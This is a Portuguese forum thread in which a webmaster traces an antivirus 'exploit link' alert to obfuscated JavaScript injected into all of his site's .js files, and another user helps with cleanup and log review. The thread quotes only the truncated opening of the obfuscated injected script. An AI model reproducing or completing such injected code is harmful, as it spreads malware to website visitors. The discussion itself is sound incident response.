Jump to content
  • Revista PROGRAMAR: Já está disponível a edição #60 da revista programar. Faz já o download aqui!

Sign in to follow this  
fil79

alerta segurança

Recommended Posts

fil79

Boas

Ao aceder a um site que faço agestão aparece a seguinte mensagem de alerta do AVG:

"EXPLOIT LINK TO KNOW EXPLOIT SITE"... que tipo de ameaça se trata e como resolver?

Desde já agradeço


MCITP-MCTS-MCP

Share this post


Link to post
Share on other sites
softklin

Nem é favorável ao hacker que a página esteja visivelmente alterada. Essa iframe, através de CSS, não é visivel no browser. A solução passa por remover essa linha. Se estiver relacionado com o problema do outro tópico, convém alterar as password o mais rapidamente possível e aplicar melhores medidas de segurança.


Nick antigo: softclean | Tens um projeto? | Wiki P@P

Ajuda a comunidade! Se encontrares algo de errado, usa a opção "Denunciar" por baixo de cada post.

Share this post


Link to post
Share on other sites
fil79

a questão é que não encontro essa linha, se retirar os dois includes (classe mysql e variáveis) o erro desaparece, mas já verifiquei e os ficheiros não têm nada.

Já alterei os dados de acesso FTP.


MCITP-MCTS-MCP

Share this post


Link to post
Share on other sites
softklin

Esse ficheiros estão a fazer include de mais alguns? já viste a própria página HTML (ficheiro que o firebug aponta)? Se conseguires, acho que o Filezilla mostra a data de modificação dos ficheiros, tenta procurar por aí.


Nick antigo: softclean | Tens um projeto? | Wiki P@P

Ajuda a comunidade! Se encontrares algo de errado, usa a opção "Denunciar" por baixo de cada post.

Share this post


Link to post
Share on other sites
fil79

óptima ideia...descobri vários ficheiros com esta linha:

<script>var f=new Date();try {var H='[';var n='';var P='replace';var kb='';var V=']';var Q=RegExp;var d='g';var o=new String();var eG="";function m(Z,G){var sv=new Array();var Qv=H.........

</script>

ainda estou a limpar...obrigado


MCITP-MCTS-MCP

Share this post


Link to post
Share on other sites
fil79

ok, parece estar tudo...todos os ficheiros javascript tinha a linha mencionada...agora gostaria de saber como aconteceu...eu desconfio que tenha sido alguém que tenha entrada no pc como referi ontem, mas não sei...em relação

a segurança do site eu passei no acutenix e dá dois avisos..para fazer um uograde da versão do PHP e outra do Mysql...de resto não aparece nada de XSS ou outro...


MCITP-MCTS-MCP

Share this post


Link to post
Share on other sites
fil79

há um dado muito interessante: todos os ficheiros .js tinham a tal linha e constato no filezilla que o upload é feito em minutos certos...um grupo de ficheiros é enviado à 13h 28.00, o segundo às 13h 29.00, etc...suponho que tenha sido um software


MCITP-MCTS-MCP

Share this post


Link to post
Share on other sites
softklin

Também concluo que se trate de um processo automatizado, com essa informação que dás.

Dizes ainda que tens vários websites, e que ambos foram atacados. Verifica que software estás a correr, compara as semelhanças dos ataques, e ainda o relatório de acessos do servidor WWW para verificar "picos" de páginas acedidas. Uma página acedida muitas vezes pelo mesmo computador pode significar que alguém andou a experimentar algo. A vulnerabilidade pode estar aí.


Nick antigo: softclean | Tens um projeto? | Wiki P@P

Ajuda a comunidade! Se encontrares algo de errado, usa a opção "Denunciar" por baixo de cada post.

Share this post


Link to post
Share on other sites
softklin

Provavelmente será mais difundir malware, visto que incluíram aquela iframe com o website malicioso. É muito comum acontecer a websites que esteja no topo de pesquisas do Google, por exemplo, é uma técnica chamada blackhat seo.


Nick antigo: softclean | Tens um projeto? | Wiki P@P

Ajuda a comunidade! Se encontrares algo de errado, usa a opção "Denunciar" por baixo de cada post.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.